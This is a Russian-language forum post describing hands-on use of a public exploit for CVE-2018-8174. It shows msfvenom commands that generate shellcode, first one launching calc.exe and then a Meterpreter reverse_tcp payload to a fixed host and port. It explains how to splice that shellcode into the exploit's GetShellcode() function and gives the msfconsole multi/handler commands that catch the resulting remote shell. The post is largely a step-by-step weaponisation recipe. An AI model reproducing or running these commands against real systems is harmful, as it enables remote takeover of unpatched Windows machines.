Обзор эксплойта CVE-2018-8174

lukas

RAM
Пользователь
Регистрация
11.10.2018
Сообщения
113
Оценка реакций
134
Баллы
45
Наткнулся тут на статью про эксплоит CVE-2018-8174, сколько шума вокруг него.
Решил проверить лично, так как уж любят приукрасить журналисты.

Первым делом отправился на exploit-db скачал нужный эксплоит.
По традиции запустим калькулятор, стандартный payload мы юзать не будем а вместо этого выполним нашу команду:
Код:
msfvenom -p windows/exec cmd='mshta[removed]CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)' -f js_le a x86
И так payload мы сгенерировали получилось (%ue8fc%u0082%u0000%u8960%u31e5%u64.......6573%u0029)



Теперь нам нужно найти где выполняется шеллкод в эксплоите, в данном случае у нас оказалась строка



Функция GetShellcode()
Заменяем нашей строкой (%ue8fc%u0082%u0000%u8960%u31e5%u64.......6573%u0029).
Проверяем что у нас получилось.



Отлично все отработало!!!
Попробуем установить reverse connect
Сгенерируем новый payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.78.1 LPORT=4444 -f js_le -a x86



и повторим предыдущие действия, заменим строку шеллкода.
Но теперь будем ждать конекта, открываем консоль и вводим команды
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ваш ip
set LPORT 4444
set ExitOnSession false
exploit -j -z


И снова удача=)

Всем спасибо за внимание!!![/B]


статью написал leeex
 
Верх